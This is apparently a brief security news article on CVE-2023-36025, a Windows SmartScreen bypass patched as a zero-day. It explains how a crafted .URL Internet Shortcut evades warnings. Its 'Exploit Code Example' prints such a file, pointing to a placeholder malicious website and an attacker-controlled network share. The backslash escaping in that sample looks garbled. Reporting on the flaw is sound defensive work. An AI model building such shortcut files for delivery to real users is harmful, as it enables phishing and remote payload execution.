Microsoft released multiple security patches as part of their Patch Tuesday, in which three zero-day vulnerabilities were also patched. One of the zero-day vulnerabilities was CVE-2023-36025, which affected the Windows SmartScreen function.

This vulnerability was given a severity rating of 8.8 (High) and was actively exploited by threat actors in the wild. This vulnerability was reported to be a security bypass vulnerability that an unauthorized threat actor can exploit but requires user interaction for successful exploitation.

Windows SmartScreen Zero-day Vulnerability

SmartScreen guards against untrusted sources, warning users about potentially malicious websites and files. 

This vulnerability allows a threat actor to craft special files or hyperlinks that could bypass SmartScreen’s security warnings.

However, the exploitation of this vulnerability was associated with a crafted Internet Shortcut File (.URL), which SmartScreen does not properly validate.

Exploit Code Example

A crafted file that can exploit this vulnerability can be found below

[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\\\\\\\192.168.1.100\\\\share\\\\icon.ico
IconIndex=1

The URL in the file points to a malicious website, and the IconFile path can point to a network location controlled by the threat actor. With these parameters, a threat actor could download malicious payloads and execute them on vulnerable systems.

Moreover, the initial delivery of this malicious file could be through phishing emails or compromised websites. If the user downloads and clicks on the malicious internet shortcut file, the payload gets executed, providing access to a threat actor.

A complete proof of concept for this vulnerability has been published, providing detailed information on the source code, method, and other information.